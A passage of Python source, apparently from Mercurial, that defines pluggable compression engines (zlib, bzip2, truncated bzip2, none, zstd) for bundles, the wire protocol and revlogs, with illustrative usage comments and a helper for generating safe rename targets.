        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also
        implement ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

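# Example (a minimal sketch, not registered in this module): a hypothetical
# pass-through engine showing the smallest useful subset of the interface.
# A real engine would compress in compressstream() and wrap fh with a
# decompressing reader in decompressorreader():
#
#   class _identityengine(compressionengine):
#       def name(self):
#           return 'identity'           # hypothetical engine name
#
#       def bundletype(self):
#           """Example help text for the hypothetical engine."""
#           return 'identity', 'ID'     # hypothetical bundle spec/identifier
#
#       def compressstream(self, it, opts=None):
#           return it
#
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_identityengine())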
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

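# Example (illustrative): round-tripping data through the zlib engine's
# streaming APIs, using the module-level stringio alias for the file object:
#
#   engine = compengines['zlib']
#   compressed = ''.join(engine.compressstream(['hello ', 'world']))
#   assert engine.decompressorreader(stringio(compressed)).read() == \
#       'hello world'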
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled
    # elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

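# Example (illustrative): with the engines registered up to this point, the
# server-side wire protocol ordering follows the declared priorities, with
# the bzip2/none tie at priority 0 broken alphabetically by wire name:
#
#   [e.name() for e in compengines.supportedwireengines(SERVERROLE)]
#   # -> ['zlib', 'bz2', 'none']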
class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output.
            # However, it allows decompression to be more optimal since we
            # can pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

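# Example (illustrative, only meaningful when the zstd module is importable):
# revlog code obtains a reusable compressor object and round-trips a chunk.
# compress() intentionally returns None for input that is too small or does
# not shrink:
#
#   engine = compengines['zstd']
#   if engine.available():
#       c = engine.revlogcompressor()
#       data = 'x' * 1000
#       compressed = c.compress(data)
#       if compressed is not None:
#           assert c.decompress(compressed) == data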
def bundlecompressiontopics():
    """Obtains a dict of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

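# Example (illustrative): the returned dict is keyed on the user-facing
# bundle spec names, each value exposing the engine's formatted docstring:
#
#   topics = bundlecompressiontopics()
#   sorted(topics.keys())     # e.g. ['bzip2', 'gzip', 'none', 'zstd']
#   topics['gzip'].__doc__    # starts with '``gzip``'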
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
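
# Example (illustrative): if 'foo~merge' and 'foo~merge~1' are already taken,
# safename keeps counting until it finds a free slot:
#
#   safename('foo', 'merge', ctx, others={'foo~merge', 'foo~merge~1'})
#   # -> 'foo~merge~2' (for some changectx ctx not containing these names)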